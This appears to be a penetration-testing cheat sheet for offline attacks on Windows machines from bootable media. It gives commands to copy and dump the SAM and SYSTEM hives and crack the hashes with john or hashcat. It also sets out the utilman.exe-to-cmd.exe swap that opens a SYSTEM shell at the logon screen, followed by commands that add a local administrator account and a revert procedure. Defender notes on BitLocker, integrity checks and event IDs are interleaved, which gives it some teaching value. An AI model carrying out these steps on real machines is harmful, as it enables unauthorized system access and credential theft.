# - USB Live Kali
# - Mount the Windows system disk
# - Get the SAM and SYSTEM files from "C:\Windows\System32\config\"
# - Extract hashes → samdump2 SYSTEM SAM > hash.txt
# - Crack the hashes using JTR (john -format=NT hash.txt) or Hashcat
# - You may have to use "bkhive" on the SYSTEM file first
# - The John format can also be NT2
Utilman.exe attack
# You can get a SYSTEM cmd shell if you have access to the filesystem
# utilman.exe can be run BEFORE login with "WinKey + U"
# If you can access the filesystem and replace utilman.exe with cmd.exe, a SYSTEM shell will be run.
# Access can be gained from a live bootable key (Linux, Windows, ...)
# From a Windows 10 bootable key -> SHIFT + F10 to access the filesystem
# Swap the accessibility helper for a shell on the mounted system volume (d: here,
# as seen from the boot media; the drive letter depends on the live environment).
# Defender notes: this only works when the system volume is readable offline, so
# full-disk encryption (e.g. BitLocker) is the primary mitigation. The resulting
# utilman.exe is a copy of cmd.exe, so its hash and signature no longer match the
# original — file-integrity monitoring or a signature check of System32 will flag it.
move d:\windows\system32\utilman.exe d:\windows\system32\utilman.exe.bak
copy d:\windows\system32\cmd.exe d:\windows\system32\utilman.exe
# OR
# Same swap done from a cmd prompt on the target volume instead of with full paths.
# NOTE(review): "C:\" on its own is not a drive change in cmd; the revert section
# below uses the bare "C:" form, which is the one that works — confirm which was
# intended. The drive letter also differs from the d: used above; it depends on how
# the volume is mounted in the boot environment.
C:\
cd windows\system32
ren utilman.exe utilman.exe.bak
copy cmd.exe utilman.exe
# Then on the logon screen --> WinKey + U
# And then
# Creates a local account and adds it to the local Administrators group.
# Defender notes: both actions are written to the Security event log (account
# creation 4720, addition to a security-enabled local group 4732); with
# process-creation auditing and command-line logging enabled (4688) the plaintext
# password on the command line is recorded as well. A new local admin appearing
# while the logged-on user is SYSTEM at the logon screen is a strong indicator.
net user NewGuy abc123 /add
net localgroup Administrators NewGuy /add
# Reverting
# To restore utilman.exe, in the Command Prompt type:
# Puts the original binary back: the cmd.exe copy is deleted and the .bak is renamed.
# Defender notes: restoring the file returns its hash to the original, but this step
# does not remove the local account created above nor the event-log entries — an
# incident responder should check for both even when utilman.exe looks intact.
C:
cd windows\system32
del utilman.exe
ren utilman.exe.bak utilman.exe